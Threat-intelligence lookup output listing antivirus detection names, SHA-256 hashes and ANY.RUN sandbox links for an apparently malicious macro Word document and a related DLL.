[-] Scans: (‘VIPRE’, ‘LooksLike[.]Macro[.]Malware.k (v)’)
[-] Scans: (‘TrendMicro’, ‘HEUR_VBA.O2’)
[-] Scans: (‘McAfee-GW-Edition’, ‘BehavesLike.OLE2[.]Downloader[.]hg’)
[-] Scans: (‘SentinelOne’, ‘Static AI – Malicious OLE’)
[-] Scans: (‘Avira’, ‘TR/Kryptik[.]xdzeq’)
[-] Scans: (‘Arcabit’, ‘HEUR[.]VBA[.]CG.2’)
[-] Scans: (‘AegisLab’, ‘Trojan[.]MSWord[.]Generic.4!c’)
[-] Scans: (‘ZoneAlarm’, ‘HEUR:Trojan-Dropper.MSOffice[.]SDrop[.]gen’)
[-] Scans: (‘Cynet’, ‘Malicious (score: 85)’)
[-] Scans: (‘TACHYON’, ‘Suspicious/W97[.]NS[.]Gen’)
[-] Scans: (‘VBA32’, ‘BScope[.]TrojanBanker[.]Cridex’)
[-] Scans: (‘ESET-NOD32’, ‘a variant of Win32/GenKryptik[.]EYBL’)
[-] Scans: (‘Rising’, ‘Trojan[.]Generic@ML.90 (RDML:f8Eizix+kbfanr6xWOun9w)’)
[-] Scans: (‘MaxSecure’, ‘Trojan[.]Malware.121218[.]susgen’)
[-] Scans: (‘Fortinet’, ‘W32/GenKryptik[.]EYBY!tr’)
[-] Scans: (‘AVG’, ‘VBS:Obfuscated-gen [Trj]’)
[-] Scans: (‘Qihoo-360’, ‘virus[.]office[.]obfuscated.1’)

********************************************************************************
* Information for ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
[-] No VirusTotal File Report Results

Munin results
-------------
1 / 2 > Unknown
HASH: ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b COMMENT: W0rd.dll
RESULT: – / –
[!] Sample on ANY.RUN URL: https://any.run/report/ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b

2 / 2 > Malicious
HASH: 2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238 COMMENT: 1208_37832604.doc
VIRUS: Kaspersky: HEUR:Trojan-Dropper.MSOffice.SDrop.gen / TrendMicro: HEUR_VBA.O2 / ESET-NOD32: a variant of Win32/GenKryptik.EYBL / Symantec: Trojan.Gen.2 / F-Secure: Trojan.TR/Kryptik.xdzeq
TYPE: – SIZE: 0 FILENAMES: –
FIRST: – LAST: 2020-12-09 07:53:20 SUBMISSIONS: 0 REPUTATION: 0
COMMENTS: 0 USERS: – TAGS:
RESULT: 25 / 62
[!] Sample on ANY.RUN URL: https://any.run/report/2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238
